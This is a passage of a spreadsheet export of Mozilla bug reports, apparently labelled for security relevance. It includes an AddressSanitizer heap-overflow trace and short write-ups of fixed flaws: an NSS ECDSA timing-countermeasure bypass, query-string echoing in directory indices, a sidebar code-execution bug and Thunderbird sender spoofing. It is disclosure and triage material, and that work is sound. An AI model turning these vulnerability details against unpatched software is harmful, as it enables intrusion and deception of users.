    #8 0x7fa831b13f55 in NS_NewViewportFrame(mozilla::PresShell*, mozilla::ComputedStyle*) /builds/worker/checkouts/gecko/layout/generic/ViewportFrame.cpp:33:10
    #9 0x7fa8319f0292 in nsCSSFrameConstructor::ConstructRootFrame() /builds/worker/checkouts/gecko/layout/base/nsCSSFrameConstructor.cpp:2486:7
    #10 0x7fa83195744e in mozilla::PresShell::Initialize() /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:1879:36
    #11 0x7fa82d31fa8b in nsContentSink::StartLayout(bool) /builds/worker/checkouts/gecko/dom/base/nsContentSink.cpp:871:30
    #12 0x7fa82c1a7459 in nsHtml5TreeOpExecutor::StartLayout(bool*) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:826:18
==527348==WARNING: Symbolizer buffer too small
    #13 0x7fa82c1b201b  (/tmp/m-c-20210623155828-asan-opt/libxul.so+0x54e501b)
==527348==WARNING: Symbolizer buffer too small
    #14 0x7fa82c1a612e  (/tmp/m-c-20210623155828-asan-opt/libxul.so+0x54d912e)
    #15 0x7fa82c1a5307 in umberAndFreeze, opSvgLoad, opMaybeComplainAboutCharset, opMaybeComplainAboutDeepTree, opAddClass, opAddViewSourceHref, opAddViewSourceBase, opAddErrorType, opAddLineNumberId, opStartLayout, opEnableEncodingMenu&gt; &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #16 0x7fa82c1a5307 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #17 0x7fa82c1a5307 in decltype(auto) mozilla::detail::VariantImplementation&lt;unsigned char, 7ul,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match&lt;nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**, bool*, bool*)::TreeOperationMatcher,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amp;&gt;(nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**, bool*, bool*)::TreeOperationMatcher&amp;&amp;,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amp;) /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #18 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #19 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #20 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #21 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #22 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #23 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher,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 &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #24 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher, mozilla::Variant&lt;uninitialized, opAppend, opDetach, opAppendChildrenToNewParent, opFosterParent, opAppendToDocument, opAddAttributes, nsHtml5DocumentMode, opCreateHTMLElement, opCreateSVGElement, opCreateMathMLElement, opSetFormElement, opAppendText, opFosterParentText, opAppendComment, opAppendCommentToDocument, opAppendDoctypeToDocument, opGetDocumentFragmentForTemplate, opGetFosterParent, opMarkAsBroken, opRunScript, opRunScriptAsyncDefer, opPreventScriptExecution, opDoneAddingChildren, opDoneCreatingElement, opSetDocumentCharset, opCharsetSwitchTo, opUpdateStyleSheet, opProcessOfflineManifest, opMarkMalformedIfScript, opStreamEnded, opSetStyleLineNumber, opSetScriptLineNumberAndFreeze, opSvgLoad, opMaybeComplainAboutCharset, opMaybeComplainAboutDeepTree, opAddClass, opAddViewSourceHref, opAddViewSourceBase, opAddErrorType, opAddLineNumberId, opStartLayout, opEnableEncodingMenu&gt; &amp;&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:278:14
    #25 0x7fa82c1ac1c6 in match&lt;TreeOperationMatcher&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:851:12
    #26 0x7fa82c1ac1c6 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**, bool*, bool*) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOperation.cpp:1213:21
    #27 0x7fa82a398dcf in nsHtml5ExecutorFlusher::Run() /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:179:18
    #28 0x7fa82a3dce22 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:143:20
    #29 0x7fa82a3a9940 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:502:16
    #30 0x7fa82a3a7188 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:805:26
    #31 0x7fa82a3a789d in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:641:15
    #32 0x7fa82a3e7101 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:425:36
    #33 0x7fa82a3c4298 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:135:37
    #34 0x7fa82a3c4298 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:534:5
    #35 0x7fa82a3cf0dc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1152:16
    #36 0x7fa82b4b824a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
    #37 0x7fa82b3c42b1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #38 0x7fa83140a4e7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #39 0x7fa83140a4e7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #40 0x7fa83140a4e7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #41 0x7fa8352fe60f in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
    #42 0x7fa82b3c42b1 in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:910:20
    #43 0x7fa8352fdfe4 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #44 0x7fa8352fdfe4 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #45 0x7fa8352fdfe4 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #46 0x55e44770742d in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:742:34
    #47 0x55e447707851 in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #48 0x7fa846c3cb24 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327:18
SUMMARY: AddressSanitizer: heap-buffer-overflow (/tmp/m-c-20210623155828-asan-opt/libxul.so+0xad78f08) in __libc_start_main
Shadow bytes around the buggy address:
  0x0c4a800389d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a800389e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a800389f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80038a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80038a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f7
=&gt;0x0c4a80038a20: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80038a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80038a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80038a50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80038a60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80038a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==527348==ABORTING
```</t>
        </is>
      </c>
      <c r="X6434" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6435">
      <c r="A6435" t="n">
        <v>840263</v>
      </c>
      <c r="B6435" t="inlineStr">
        <is>
          <t>2013-02-11 13:58:55 -0800</t>
        </is>
      </c>
      <c r="C6435" t="inlineStr">
        <is>
          <t>[FIX] nsDocumentViewer::LoadComplete doesn't guarantee that window object stays alive</t>
        </is>
      </c>
      <c r="D6435" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6435" t="n">
        <v>1</v>
      </c>
      <c r="F6435" t="n">
        <v>1</v>
      </c>
      <c r="G6435" t="n">
        <v>3</v>
      </c>
      <c r="H6435" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6435" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6435" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6435" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6435" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6435" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6435" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6435" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+][qa-]</t>
        </is>
      </c>
      <c r="Q6435" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6435" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6435" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T6435" t="n">
        <v>1</v>
      </c>
      <c r="U6435" t="n">
        <v>0</v>
      </c>
      <c r="V6435" t="n">
        <v>19</v>
      </c>
      <c r="W6435" t="inlineStr">
        <is>
          <t>Created attachment 712612
patch
I was debugging bug 840019, and noticed that we may have a security bug there, not only
a null pointer crash.
SetReadyStateInternal dispatches readystatechanged, yet we dispatch load event
after that to window, and window is just a raw pointer.
The patch fixes both this bug and bug 840019.</t>
        </is>
      </c>
      <c r="X6435" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6436">
      <c r="A6436" t="n">
        <v>514526</v>
      </c>
      <c r="B6436" t="inlineStr">
        <is>
          <t>2009-09-03 14:11:13 -0700</t>
        </is>
      </c>
      <c r="C6436" t="inlineStr">
        <is>
          <t>Change the links and text on the front page of QMO</t>
        </is>
      </c>
      <c r="D6436" t="inlineStr">
        <is>
          <t>2010-05-28 10:20:50 -0700</t>
        </is>
      </c>
      <c r="E6436" t="n">
        <v>1</v>
      </c>
      <c r="F6436" t="n">
        <v>1</v>
      </c>
      <c r="G6436" t="n">
        <v>5</v>
      </c>
      <c r="H6436" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6436" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J6436" t="inlineStr">
        <is>
          <t>Content</t>
        </is>
      </c>
      <c r="K6436" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6436" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6436" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6436" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6436" t="inlineStr"/>
      <c r="Q6436" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6436" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6436" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6436" t="n">
        <v>1</v>
      </c>
      <c r="U6436" t="n">
        <v>0</v>
      </c>
      <c r="V6436" t="n">
        <v>4</v>
      </c>
      <c r="W6436" t="inlineStr">
        <is>
          <t>Just as the subject mentions, the links are not really usable and port well to the current status of our community. Please mention what'd you like changed to the text and links associated with "Test, Code, Bugs and Data".</t>
        </is>
      </c>
      <c r="X6436" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6437">
      <c r="A6437" t="n">
        <v>1631573</v>
      </c>
      <c r="B6437" t="inlineStr">
        <is>
          <t>2020-04-20 12:44:28 -0700</t>
        </is>
      </c>
      <c r="C6437" t="inlineStr">
        <is>
          <t>ECDSA Timing Countermeasure Bypass</t>
        </is>
      </c>
      <c r="D6437" t="inlineStr">
        <is>
          <t>2021-09-23 09:30:33 -0700</t>
        </is>
      </c>
      <c r="E6437" t="n">
        <v>1</v>
      </c>
      <c r="F6437" t="n">
        <v>1</v>
      </c>
      <c r="G6437" t="n">
        <v>3</v>
      </c>
      <c r="H6437" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6437" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6437" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6437" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6437" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6437" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6437" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6437" t="inlineStr">
        <is>
          <t>[sec-moderate for Firefox][RedHat INC1266620][disclosure date 2020-07-28][sec-survey][adv-main80+]</t>
        </is>
      </c>
      <c r="Q6437" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6437" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6437" t="inlineStr">
        <is>
          <t>3.55</t>
        </is>
      </c>
      <c r="T6437" t="n">
        <v>1</v>
      </c>
      <c r="U6437" t="n">
        <v>0</v>
      </c>
      <c r="V6437" t="n">
        <v>19</v>
      </c>
      <c r="W6437" t="inlineStr">
        <is>
          <t>[filed from mail to security@ from Alejandro Cabrera Aldaya]
Hello
We are a research group from Tampere University, Finland.
We have been analyzing NSS regarding side-channel vulnerabilities.
We have found that current NSS ECDSA code bypasses one countermeasure used
to prevent a timing attack during signature generation.
Please, find the details of our findings in the attached report.
Best regards,
Alejandro  
[timing_bypass_ecdsa_report.md attachment]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - --- - - - - - 
# ECDSA timing vulnerability.
A timing attacker against ECDSA signature generation is able to obtain information from the secret nonce measuring the time an ECDSA signature generation takes.
# Description
Current NSS code path has a countermeasure to prevent this know attack since 2011 [1] (actually cited in the code).
However, we have found that said countermeasure is currently completely bypassed.
The countermeasure is in ``lib/freebl/ec.c` :
`    CHECK_MPI_OK(mp_add(&amp;k, &amp;n, &amp;k));`
`    if (mpl_significant_bits(&amp;k) &lt;= mpl_significant_bits(&amp;n)) {`
`	       CHECK_MPI_OK(mp_add(&amp;k, &amp;n, &amp;k));`
`    }`
Thus when this code snipped is executed during an ECDSA signature generation,
the nonce is _padded_ such that its bit-length reveals nothing about it.
However, subsequent function calls during scalar multiplication, `ECPoints_mul` and `ECPoint_mul`,
removes this padding, thus making the countermeasure useless.
(actually, only one removes the padding, but reporting both as fixing one will not fix the issue)
# Fix
Remove the unpadding from `ECPoints_mul` and `ECPoint_mul`.
We don't know if there is a correctness rationale to reduce this nonce, you know better.
# Disclosure
We are planning for a public disclosure on May 18. But this embargo date
is also up for discussion.
# Links
[1] - http://eprint.iacr.org/2011/232</t>
        </is>
      </c>
      <c r="X6437" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6438">
      <c r="A6438" t="n">
        <v>1488061</v>
      </c>
      <c r="B6438" t="inlineStr">
        <is>
          <t>2018-09-02 05:58:53 -0700</t>
        </is>
      </c>
      <c r="C6438" t="inlineStr">
        <is>
          <t>Directory indices shouldn't just echo all URL input</t>
        </is>
      </c>
      <c r="D6438" t="inlineStr">
        <is>
          <t>2022-03-01 09:44:18 -0800</t>
        </is>
      </c>
      <c r="E6438" t="n">
        <v>1</v>
      </c>
      <c r="F6438" t="n">
        <v>1</v>
      </c>
      <c r="G6438" t="n">
        <v>3</v>
      </c>
      <c r="H6438" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6438" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6438" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6438" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6438" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6438" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6438" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6438" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage][adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q6438" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6438" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6438" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T6438" t="n">
        <v>1</v>
      </c>
      <c r="U6438" t="n">
        <v>0</v>
      </c>
      <c r="V6438" t="n">
        <v>17</v>
      </c>
      <c r="W6438" t="inlineStr">
        <is>
          <t>Follow-up from bug 1460538:
STR:
1. open:
   chrome://browser/content/places/?%27*{}*{color:red}
as a toplevel URL
AR:
we show a directory index of the places folder, but we echo the query string into the resulting HTML as-is.
ER:
we shouldn't echo the query string or hash.
We may also want to consider enforcing other restrictions on chrome/resource URLs (e.g. has to match #^[.a-z0-9/_-]*$#, so only latin alphanumeric, forward slashes as path separators, '.', '_' and '-', nothing else). We probably can't reliably enforce any restrictions on file:/// URIs, so sadly probably can't enforce such restrictions on all directory indices.</t>
        </is>
      </c>
      <c r="X6438" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6439">
      <c r="A6439" t="n">
        <v>479560</v>
      </c>
      <c r="B6439" t="inlineStr">
        <is>
          <t>2009-02-20 22:45:27 -0800</t>
        </is>
      </c>
      <c r="C6439" t="inlineStr">
        <is>
          <t>Arbitrary code execution using sidebar</t>
        </is>
      </c>
      <c r="D6439" t="inlineStr">
        <is>
          <t>2015-10-16 11:47:43 -0700</t>
        </is>
      </c>
      <c r="E6439" t="n">
        <v>1</v>
      </c>
      <c r="F6439" t="n">
        <v>1</v>
      </c>
      <c r="G6439" t="n">
        <v>3</v>
      </c>
      <c r="H6439" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6439" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6439" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6439" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6439" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6439" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6439" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6439" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q6439" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6439" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6439" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T6439" t="n">
        <v>1</v>
      </c>
      <c r="U6439" t="n">
        <v>0</v>
      </c>
      <c r="V6439" t="n">
        <v>31</v>
      </c>
      <c r="W6439" t="inlineStr">
        <is>
          <t>In nsSidebar.prototype.getInterfaces(), count is an object created in content,
thus it's unsafe to access count.value.</t>
        </is>
      </c>
      <c r="X6439" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6440">
      <c r="A6440" t="n">
        <v>1617370</v>
      </c>
      <c r="B6440" t="inlineStr">
        <is>
          <t>2020-02-22 03:30:52 -0800</t>
        </is>
      </c>
      <c r="C6440" t="inlineStr">
        <is>
          <t>Sender Email Address Spoofing by encoded extraneous white space in display name</t>
        </is>
      </c>
      <c r="D6440" t="inlineStr">
        <is>
          <t>2020-08-08 09:37:24 -0700</t>
        </is>
      </c>
      <c r="E6440" t="n">
        <v>1</v>
      </c>
      <c r="F6440" t="n">
        <v>1</v>
      </c>
      <c r="G6440" t="n">
        <v>2</v>
      </c>
      <c r="H6440" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6440" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J6440" t="inlineStr">
        <is>
          <t>Message Reader UI</t>
        </is>
      </c>
      <c r="K6440" t="inlineStr">
        <is>
          <t>60</t>
        </is>
      </c>
      <c r="L6440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6440" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6440" t="inlineStr"/>
      <c r="Q6440" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6440" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6440" t="inlineStr">
        <is>
          <t>Thunderbird 77.0</t>
        </is>
      </c>
      <c r="T6440" t="n">
        <v>1</v>
      </c>
      <c r="U6440" t="n">
        <v>0</v>
      </c>
      <c r="V6440" t="n">
        <v>27</v>
      </c>
      <c r="W6440" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1506587 +++
By abusing Unicode whitespaces (e.g., U+3000) within the 'From:' email header, an attacker can spoof the sender email address when displayed by the Thunderbird mail client.
Turns out bug 1506587 didn't fix the case where the special characters are encoded.
Testcase in attachment 9128245.</t>
        </is>
      </c>
      <c r="X6440" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6441">
      <c r="A6441" t="n">
        <v>92191</v>
      </c>
      <c r="B6441" t="inlineStr">
        <is>
          <t>2001-07-24 17:28:18 -0700</t>
        </is>
      </c>
      <c r="C6441" t="inlineStr">
        <is>
          <t>Crash in Subscribe window if you refresh with 'x' as search string</t>
        </is>
      </c>
      <c r="D6441" t="inlineStr">
        <is>
          <t>2009-01-22 10:17:39 -0800</t>
        </is>
      </c>
      <c r="E6441" t="n">
        <v>1</v>
      </c>
      <c r="F6441" t="n">
        <v>1</v>
      </c>
      <c r="G6441" t="n">
        <v>3</v>
      </c>
      <c r="H6441" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6441" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J6441" t="inlineStr">
        <is>
          <t>Networking: NNTP</t>
        </is>
      </c>
      <c r="K6441" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6441" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6441" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6441" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6441" t="inlineStr">
        <is>
          <t>approved for 0.9.3</t>
        </is>
      </c>
      <c r="Q6441" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6441" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6441" t="inlineStr">
        <is>
          <t>mozilla0.9.3</t>
        </is>
      </c>
      <c r="T6441" t="n">
        <v>1</v>
      </c>
      <c r="U6441" t="n">
        <v>0</v>
      </c>
      <c r="V6441" t="n">
        <v>13</v>
      </c>
      <c r="W6441" t="inlineStr">
        <is>
          <t>I can reproduce this crash 100%
1. Open the subscribe window for a news server
2. Type in 'x' in the search textfield
3. Click refresh
BOOM!
It looks like a bug similar to what sspitzer fixed recently. The
outlinerselection is null. 
Seth, there might be a real underlying problem you just hid last time (?)
nsOutlinerBodyFrame::PrefillPropertyArray(int 0, nsOutlinerColumn * 0x00000000)
line 1215 + 22 bytes
nsOutlinerBodyFrame::PaintRow(nsOutlinerBodyFrame * const 0x04c3663c, int 0,
const nsRect &amp; {...}, nsIPresContext * 0x03d1c160, nsIRenderingContext &amp; {...},
const nsRect &amp; {...}, nsFramePaintLayer eFramePaintLayer_Underlay) line 1588
nsOutlinerBodyFrame::Paint(nsOutlinerBodyFrame * const 0x04c3663c,
nsIPresContext * 0x03d1c160, nsIRenderingContext &amp; {...}, const nsRect &amp; {...},
nsFramePaintLayer eFramePaintLayer_Underlay) line 1530
PresShell::Paint(PresShell * const 0x03d1d124, nsIView * 0x0538da00,
nsIRenderingContext &amp; {...}, const nsRect &amp; {...}) line 5363 + 34 bytes
nsView::Paint(nsView * const 0x0538da00, nsIRenderingContext &amp; {...}, const
nsRect &amp; {...}, unsigned int 128, int &amp; 268603797) line 275
nsViewManager::RenderDisplayListElement(DisplayListElement2 * 0x03e3ed50,
nsIRenderingContext &amp; {...}) line 1440
nsViewManager::RenderViews(nsIView * 0x0538da00, nsIRenderingContext &amp; {...},
const nsRect &amp; {...}, int &amp; 0) line 1365
nsViewManager::Refresh(nsIView * 0x0538da00, nsIRenderingContext * 0x03e3eda0,
const nsRect * 0x006e90b0, unsigned int 1) line 902
nsViewManager::DispatchEvent(nsViewManager * const 0x03d1da00, nsGUIEvent *
0x006e91f0, nsEventStatus * 0x006e90f4) line 1959
HandleEvent(nsGUIEvent * 0x006e91f0) line 68
nsWindow::DispatchEvent(nsWindow * const 0x0538d8c4, nsGUIEvent * 0x006e91f0,
nsEventStatus &amp; nsEventStatus_eIgnore) line 721 + 10 bytes
nsWindow::DispatchWindowEvent(nsGUIEvent * 0x006e91f0, nsEventStatus &amp;
nsEventStatus_eIgnore) line 747
nsWindow::OnPaint() line 4049 + 28 bytes
nsWindow::ProcessMessage(unsigned int 15, unsigned int 0, long 0, long *
0x006e9664) line 3036 + 17 bytes
nsWindow::WindowProc(HWND__ * 0x00000cfc, unsigned int 15, unsigned int 0, long
0) line 989 + 27 bytes
KERNEL32! bff7363b()
KERNEL32! bff94407()</t>
        </is>
      </c>
      <c r="X6441" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6442">
      <c r="A6442" t="n">
        <v>356355</v>
      </c>
      <c r="B6442" t="inlineStr">
        <is>
          <t>2006-10-11 16:59:17 -0700</t>
        </is>
      </c>
      <c r="C6442" t="inlineStr">
        <is>
          <t>numeric domain normalization only happens on enchash table values</t>
        </is>
      </c>
      <c r="D6442" t="inlineStr">
        <is>
          <t>2014-05-27 12:25:31 -0700</t>
        </is>
      </c>
      <c r="E6442" t="n">
        <v>1</v>
      </c>
      <c r="F6442" t="n">
        <v>1</v>
      </c>
      <c r="G6442" t="n">
        <v>3</v>
      </c>
      <c r="H6442" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6442" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6442" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K6442" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6442" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6442" t="inlineStr">
